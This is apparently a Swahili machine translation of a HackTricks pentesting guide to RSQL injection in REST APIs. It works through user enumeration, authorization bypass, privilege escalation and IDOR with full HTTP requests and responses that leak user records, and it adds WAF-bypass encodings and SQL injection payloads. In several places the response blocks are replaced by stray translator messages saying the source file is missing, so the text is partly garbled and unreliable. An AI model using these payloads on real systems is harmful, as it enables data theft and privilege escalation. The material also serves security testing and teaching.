HackTricks
RSQL Injection
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
RSQL ni nini?
RSQL ni lugha ya query iliyobuniwa kwa kuchuja pembejeo kwa kutumia vigezo katika RESTful APIs. Based on FIQL (Feed Item Query Language), originally specified by Mark Nottingham for querying Atom feeds, RSQL inajitokeza kwa urahisi wake na uwezo wa kuelezea maswali changamano kwa njia fupi na inayofuata URI juu ya HTTP. Hii inafanya iwe chaguo nzuri kama lugha ya jumla ya uchunguzi kwa utafutaji wa endpoints za REST.
Muhtasari
RSQL Injection ni udhaifu katika programu za wavuti zinazotumia RSQL kama lugha ya uchunguzi katika RESTful APIs. Sawa na SQL Injection na LDAP Injection, udhaifu huu hutokea wakati vichujio vya RSQL havijasafishwa ipasavyo, na kuruhusu mshambuliaji kuingiza maswali hatarishi ili kupata, kubadilisha au kufuta data bila ruhusa.
Jinsi inavyofanya kazi?
RSQL inakuwezesha kujenga maswali changamano katika RESTful APIs, kwa mfano:
/products?filter=price>100;category==electronics
Hii inatafsiriwa kuwa query iliyopangwa inayochuja bidhaa zenye bei kubwa kuliko 100 na kategoria “electronics”.
Ikiwa programu haithibitishi vizuri pembejeo za mtumiaji, mshambuliaji anaweza kubadilisha kichujio ili kutekeleza maswali yasiyotarajiwa, kama:
/products?filter=id=in=(1,2,3);delete_all==true
Au hata kuchukua fursa kuchota taarifa nyeti kwa kutumia query za Boolean au subqueries zilizowekwa ndani.
Hatari
- Ufunuliwa kwa data nyeti: Mshambulizi anaweza kupata taarifa ambazo hazipaswi kupatikana.
- Marekebisho au ufutaji wa data: Injection ya filters zinazobadilisha rekodi za database.
- Kupandishwa kwa ruhusa: Manipulation ya identifiers zinazotoa roles kupitia filters ili kuwadanganya application kwa kuingia na ruhusa za watumiaji wengine.
- Kukwepa udhibiti wa upatikanaji: Manipulation ya filters ili kupata data iliyozuiliwa.
- Kujifanya au IDOR: Modification ya identifiers kati ya watumiaji kupitia filters zinazoruhusu kupata taarifa na rasilimali za watumiaji wengine bila kuathibitishwa ipasavyo.
Operator za RSQL zinazoungwa mkono
| Operator | Maelezo | Mfano |
|---|---|---|
; / and | Operator ya mantiki AND. Huchuja safu ambapo vigezo vyote viwili ni kweli | /api/v2/myTable?q=columnA==valueA;columnB==valueB |
, / or | Operator ya mantiki OR. Huchuja safu ambapo angalau mojawapo ya masharti ni kweli | /api/v2/myTable?q=columnA==valueA,columnB==valueB |
== | Hufanya query ya sawa. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA zinafanana kabisa na queryValue | /api/v2/myTable?q=columnA==queryValue |
=q= | Hufanya query ya search. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA zinajumuisha queryValue | /api/v2/myTable?q=columnA=q=queryValue |
=like= | Hufanya query ya like. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni kama queryValue | /api/v2/myTable?q=columnA=like=queryValue |
=in= | Hufanya query ya in. Inarudisha safu zote kutoka myTable ambapo columnA ina valueA AU valueB | /api/v2/myTable?q=columnA=in=(valueA, valueB) |
=out= | Hufanya query ya exclude. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA sio valueA wala valueB | /api/v2/myTable?q=columnA=out=(valueA,valueB) |
!= | Hufanya query ya si sawa. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA hazilingani na queryValue | /api/v2/myTable?q=columnA!=queryValue |
=notlike= | Hufanya query ya not like. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA si kama queryValue | /api/v2/myTable?q=columnA=notlike=queryValue |
< & =lt= | Hufanya query ya chini ya. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni ndogo kuliko queryValue | /api/v2/myTable?q=columnA<queryValue /api/v2/myTable?q=columnA=lt=queryValue |
=le= & <= | Hufanya query ya chini au sawa na. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni ndogo au sawa na queryValue | /api/v2/myTable?q=columnA<=queryValue /api/v2/myTable?q=columnA=le=queryValue |
> & =gt= | Hufanya query ya juu ya. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni kubwa kuliko queryValue | /api/v2/myTable?q=columnA>queryValue /api/v2/myTable?q=columnA=gt=queryValue |
>= & =ge= | Hufanya query ya sawa au kubwa kuliko. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni sawa au kubwa kuliko queryValue | /api/v2/myTable?q=columnA>=queryValue /api/v2/myTable?q=columnA=ge=queryValue |
=rng= | Hufanya query ya kutoka kwa hadi. Inarudisha safu zote kutoka myTable ambapo thamani katika columnA ni sawa au kubwa kuliko fromValue, na ndogo au sawa na toValue | /api/v2/myTable?q=columnA=rng=(fromValue,toValue) |
Kumbuka: Jedwali liliotokana na taarifa kutoka MOLGENIS and rsql-parser applications.
Mifano
- name==“Kill Bill”;year=gt=2003
- name==“Kill Bill” and year>2003
- genres=in=(sci-fi,action);(director==‘Christopher Nolan’,actor==*Bale);year=ge=2000
- genres=in=(sci-fi,action) and (director==‘Christopher Nolan’ or actor==*Bale) and year>=2000
- director.lastName==Nolan;year=ge=2000;year=lt=2010
- director.lastName==Nolan and year>=2000 and year<2010
- genres=in=(sci-fi,action);genres=out=(romance,animated,horror),director==Que*Tarantino
- genres=in=(sci-fi,action) and genres=out=(romance,animated,horror) or director==Que*Tarantino
Kumbuka: Jedwali liliotokana na taarifa kutoka rsql-parser application.
Filter za kawaida
These filters help refine queries in APIs:
| Filter | Maelezo | Mfano |
|---|---|---|
filter[users] | Huchuja matokeo kwa watumiaji maalum | /api/v2/myTable?filter[users]=123 |
filter[status] | Huchuja kwa status (active/inactive, completed, etc.) | /api/v2/orders?filter[status]=active |
filter[date] | Huchuja matokeo ndani ya mfululizo wa tarehe | /api/v2/logs?filter[date]=gte:2024-01-01 |
filter[category] | Huchuja kwa category au aina ya rasilimali | /api/v2/products?filter[category]=electronics |
filter[id] | Huchuja kwa kitambulisho cha kipekee | /api/v2/posts?filter[id]=42 |
Vigezo vya kawaida
These parameters help optimize API responses:
| Kigezo | Maelezo | Mfano |
|---|---|---|
include | Inajumuisha rasilimali zinazohusiana katika jibu | /api/v2/orders?include=customer,items |
sort | Hupanga matokeo kwa mpangilio wa kuongezeka au kupungua | /api/v2/users?sort=-created_at |
page[size] | Hudhibiti idadi ya matokeo kwa kila ukurasa | /api/v2/products?page[size]=10 |
page[number] | Inaonyesha namba ya ukurasa | /api/v2/products?page[number]=2 |
fields[resource] | Inaeleza ni fields gani zirudishwe katika jibu | /api/v2/users?fields[users]=id,name,email |
search | Hufanya utafutaji wenye kubadilika zaidi | /api/v2/posts?search=technology |
Information leakage and enumeration of users
The following request shows a registration endpoint that requires the email parameter to check if there is any user registered with that email and return a true or false depending on whether or not it exists in the database:
Ombi
GET /api/registrations HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Majibu
HTTP/1.1 400
Date: Sat, 22 Mar 2025 14:47:14 GMT
Content-Type: application/vnd.api+json
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Content-Length: 85
{
"errors": [{
"code": "BLANK",
"detail": "Missing required param: email",
"status": "400"
}]
}
Ingawa /api/registrations?email=<emailAccount> inatarajiwa, inawezekana kutumia RSQL filters kujaribu kuorodhesha na/au kuchota taarifa za watumiaji kwa kutumia special operators:
Ombi
GET /api/registrations?filter[userAccounts]=email=='test@test.com' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://locahost:3000
Connection: keep-alive
Referer: https://locahost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:09:38 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 38
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"attributes": {
"tenants": []
}
}
}
Katika kesi ya kupatikana kwa akaunti halali ya barua pepe, programu itarejesha taarifa za mtumiaji badala ya “true”, “1” au chochote katika majibu kwa seva:
Request
GET /api/registrations?filter[userAccounts]=email=='manuel**********@domain.local' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:19:46 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 293
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": {
"id": "********************",
"type": "UserAccountDTO",
"attributes": {
"id": "********************",
"type": "UserAccountDTO",
"email": "manuel**********@domain.local",
"sub": "*********************",
"status": "ACTIVE",
"tenants": [{
"id": "1"
}]
}
}
}
Authorization evasion
Katika tukio hili, tunaanza na mtumiaji mwenye jukumu la msingi ambaye hana ruhusa za kipekee (kwa mfano msimamizi) za kupata orodha ya watumiaji wote waliosajiliwa katika hifadhidata:
Ombi
GET /api/users HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Response
HTTP/1.1 403
Date: Sat, 22 Mar 2025 14:40:07 GMT
Content-Length: 0
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
Tena tunatumia filters na special operators zitakazotuwezesha njia mbadala ya kupata taarifa za users na kuepuka access control. Kwa mfano, filter kwa wale users ambao wana herufi “a” katika user ID zao:
Ombi
GET /api/users?filter[users]=id=in=(*a*) HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb.................
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sina yaliyomo ya faili src/pentesting-web/rsql-injection.md. Tafadhali bandika/kopi-nakili yale yaliyomo ya markdown ya faili hiyo hapa, nami nitayatafsiri kwa Kiswahili nikihifadhi sintaksia ya markdown, tags na links bila kubadilisha.
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:43:28 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 1434192
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "********A***********",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "************",
"email": "**********@domain.local",
"firstName": "rafael",
"surname": "************",
"telephoneCountryCode": "**",
"mobilePhone": "*********",
"taxIdentifier": "********",
"languageId": 1,
"createdAt": "2024-08-09T10:57:41.237Z",
"termsOfUseAccepted": true,
"id": "******************",
"type": "UserGetResponseCustomDTO"
}
}, {
"id": "*A*******A*****A*******A******",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": ""************",
"email": "juan*******@domain.local",
"firstName": "juan",
"surname": ""************",",
"telephoneCountryCode": "**",
"mobilePhone": "************",
"taxIdentifier": "************",
"languageId": 1,
"createdAt": "2024-07-18T06:07:37.68Z",
"termsOfUseAccepted": true,
"id": "*******************",
"type": "UserGetResponseCustomDTO"
}
}, {
................
Privilege Escalation
Inawezekana sana kupata endpoints fulani zinazokagua user privileges kupitia role yao. Kwa mfano, tunashughulika na user ambaye hana privileges:
Ombi
GET /api/companyUsers?include=role HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJhb......
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
I don’t have the contents of src/pentesting-web/rsql-injection.md. Please paste the markdown text you want translated to Swahili and I’ll translate it, preserving all Markdown/HTML syntax and tags.
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:08 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 11
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": []
}
Kwa kutumia operators fulani tunaweza kuorodhesha administrator users:
Request
GET /api/companyUsers?include=role&filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJh.....
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:45 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 361
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"type": "CompanyUserGetResponseDTO",
"attributes": {
"companyId": "FA**************",
"companyTaxIdentifier": "B999*******",
"bizName": "company sl",
"email": "jose*******@domain.local",
"userRole": {
"userRoleId": 1,
"userRoleKey": "general.roles.admin"
},
"companyCountryTranslationKey": "*******",
"type": "CompanyUserGetResponseDTO"
}
}]
}
Ombi
Baada ya kujua identifier ya mtumiaji wa administrator, itakuwa inawezekana kutekeleza privilege escalation kwa kubadilisha au kuongeza filter inayolingana na identifier ya administrator na kupata privileges sawa:
GET /api/functionalities/allPermissionsFunctionalities?filter[companyUsers]=user.id=='94****************************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ.....
Origin: https:/localhost:3000
Connection: keep-alive
Referer: https:/localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
I don’t have the contents of src/pentesting-web/rsql-injection.md. Please paste the file (or the portion to translate), and I will translate it to Swahili keeping the original markdown/html syntax.
HTTP/1.1 200
Date: Sat, 22 Mar 2025 18:53:00 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 68833
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"meta": {
"Functionalities": [{
"functionalityId": 1,
"permissionId": 1,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.userProfile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 2,
"permissionId": 2,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.my_profile",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 3,
"permissionId": 3,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "layout.change_user_data",
"type": "FunctionalityPermissionDTO"
}, {
"functionalityId": 4,
"permissionId": 4,
"effectivePriority": "PERMIT",
"effectiveBehavior": "PERMIT",
"translationKey": "general.configuration",
"type": "FunctionalityPermissionDTO"
}, {
....
}]
}
}
Impersonate or Insecure Direct Object References (IDOR)
Mbali na matumizi ya parameter ya filter, inawezekana kutumia vigezo vingine kama include ambavyo vinaruhusu kujumuisha katika matokeo vigezo fulani (mfano: lugha, nchi, password…).
Katika mfano ufuatao, taarifa za profaili yetu ya mtumiaji zinaonyeshwa:
Ombi
GET /api/users?include=language,country HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Jibu
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:47:27 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 540
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "D5********************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 3,
"translationKey": "**********",
"email": "domingo....@domain.local",
"firstName": "Domingo",
"surname": "**********",
"telephoneCountryCode": "**",
"mobilePhone": "******",
"languageId": 1,
"createdAt": "2024-03-11T07:24:57.627Z",
"termsOfUseAccepted": true,
"howMeetUs": "**************",
"id": "D5********************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Mchanganyiko wa vichujio unaweza kutumika kuepuka udhibiti wa idhini na kupata ufikiaji wa profaili za watumiaji wengine:
Request
GET /api/users?include=language,country&filter[users]=id=='94***************' HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/vnd.api+json
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/vnd.api+json
Authorization: Bearer eyJ...
Origin: https://localhost:3000
Connection: keep-alive
Referer: https://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Nahitaji maudhui ya faili “src/pentesting-web/rsql-injection.md” ili niweke tafsiri. Tafadhali bandika maudhui hapa.
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:50:07 GMT
Content-Type: application/vnd.api+json;charset=UTF-8
Content-Length: 520
Connection: keep-alive
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: *
{
"data": [{
"id": "94******************",
"type": "UserGetResponseCustomDTO",
"attributes": {
"status": "ACTIVE",
"countryId": 63,
"timeZoneId": 2,
"translationKey": "**************",
"email": "jose******@domain.local",
"firstName": "jose",
"surname": "***************",
"telephoneCountryCode": "**",
"mobilePhone": "********",
"taxIdentifier": "*********",
"languageId": 1,
"createdAt": "2024-11-21T08:29:05.833Z",
"termsOfUseAccepted": true,
"id": "94******************",
"type": "UserGetResponseCustomDTO"
}
}]
}
Ugunduzi & fuzzing — faida za haraka
- Angalia msaada wa RSQL kwa kutuma probes zisizo hatari kama
?filter=id==test,?q==testau malformed operators=foo=; verbose APIs mara nyingi leak parser errors (“Unknown operator” / “Unknown property”). - Matumizi mengi hufanya double-parse URL parameters; jaribu double-encoding
(,),*,;(mfano%2528admin%2529) ili kuzunguka naive blocklists na WAFs. - Boolean exfil with wildcards:
filter[users]=email==*%@example.com;status==ACTIVEna badilisha mantiki kwa,(OR) ili kulinganisha ukubwa wa majibu. - Range/proximity leaks:
filter[users]=createdAt=rng=(2024-01-01,2025-01-01)huorodhesha kwa haraka kwa mwaka bila kujua IDs sahihi.
Matumizi mabaya maalum kwa Framework (Elide / JPA Specification / JSON:API)
- Elide na miradi mingi ya Spring Data REST hufasiri RSQL moja kwa moja kwenda JPA Criteria. Wakati waendelezaji wanaongeza custom operators (mfano,
=ilike=) na kujenga predicates kwa string concatenation badala ya prepared parameters, unaweza kupindua kwenda SQLi (payload ya kawaida:name=ilike='%%' OR 1=1--'). - Elide analytic data store inakubali parameterized columns; kuchanganya user-controlled analytic params na RSQL filters ilikuwa chanzo cha SQLi katika CVE-2022-24827. Hata kama matoleo yaliyorudishwa yanaparameterize vizuri, code bespoke ya aina hiyo mara nyingi hubaki—tafuta
@JoinFilter/@ReadPermissionSpEL expressions zenye${}na jaribu kuingiza';sleep(5);'au tautologies za mantiki. - Backends za JSON:API mara nyingi zinaonyesha
includenafilter. Kuchuja kwenye resources zinazohusianafilter[orders]=customer.email==*admin*kunaweza kupitisha top-level ACLs kwa sababu relation-level filters zinafanya kazi kabla ya ukaguzi wa umiliki.
Vifaa vya automation
- rsql-parser CLI (Java):
java -jar rsql-parser.jar "name=='*admin*';status==ACTIVE"inathibitisha payloads lokalini na inaonyesha the abstract syntax tree—muvaa kwa kutengeneza parenthesis zilizo sawa na custom operators. - Python quick builder:
from pyrsql import RSQL
payload = RSQL().and_("email==*admin*", "status==ACTIVE").or_("role=in=(owner,admin)")
print(str(payload))
- Tumia pamoja na HTTP fuzzer (ffuf, turbo-intruder) kwa kurudia nafasi za wildcard
*a*,*e*, n.k., ndani ya orodha za=in=ili kuorodhesha IDs na emails kwa haraka.
Marejeo
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.